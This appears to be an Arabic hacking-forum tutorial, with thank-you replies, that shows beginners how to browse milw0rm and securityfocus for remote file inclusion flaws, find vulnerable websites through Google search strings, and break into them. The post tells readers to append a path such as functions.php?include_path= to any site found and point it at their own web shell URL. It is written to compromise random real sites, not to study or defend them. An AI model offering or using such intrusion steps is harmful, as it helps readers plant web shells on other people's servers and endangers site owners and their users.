حصريا كيف تبحث عن الثغرات الحديثة فى مواقع السيكيورتى بالصور

بسم الله الرحمن الرحيم
كيفكم شباب القراصنة أتمنى ان تكونوا بخير
اليوم سوف أقدم لكم شرح فريد من نوعه عن كيفية البحث عن الثغرات الحديثة فى مواقع السيكيورتى وكيفية فهمها واستغلالها وتطبيقها على موقع
سوف أتناول الشرح على أسهل نوع من الثغرات وهى( الفايل انكلود) لانى كتبت الموضوع خصيصا من أجل المبتدئين اللذين لا يعرفون شو يعنى ثغره ......يلا نبدأ الشرح
اولا سوف أشرح على أقوى موقعين للسيكيورتى وهما milw0rmوsecurityfocus
اولا:milworm
www.milw0rm.com

اضغط سوف تظهر الصفحة التاليه


طبعا هذه كل الثغرات ونوعهاوتاريخ انزالها,طبعا انا قلت سوف اتحدث عنثغرات الفايل انكلودfie include remote exploit فلنختاراى ثغره مثل اللىانامظللها



1-مستوى خطورة الثغره
2-التطبيق المصاب بالثغره
3-هذا كود البحث الذى سوف تكتبه فى جوجل
4-طبعا هذا استغلال الثغره
طبعا بعد البحث سوف تجد مواقع كثيرة مصابه بهذه الثغره ,خش على اى موقع ثم ضع بعد رابط الموقع يعنىبعدwww.site.com/استغلال الثغره المكتوب وليكن مثلاfunctions.php?include_path=http?ثم ضع بعد= رابط الشل حقك

---------------------------------------
ثانيا:securityfocus
www.securityfocus.com

بعد الضغط سوف تظهر الصفحه الاتيه



اختار اى ثغره remote file include


1-معلومات عن الثغره
2-شرحها
3-استغلال الثغره
4-الحل لترقيع الثغره
ثم


ثم
example.com/functions.php?include_path=http
هذا هو استغلال الثغره طبعا احذف ****** pathاوpathاذا صادفتك فى اى ثغره
اتمنى ان أكون قد وفقت فى الشرح


__________________

مشكورنا ويسلمووووووووووووووووووا ومستنين المزيد يافارس

مستنين كل مزيد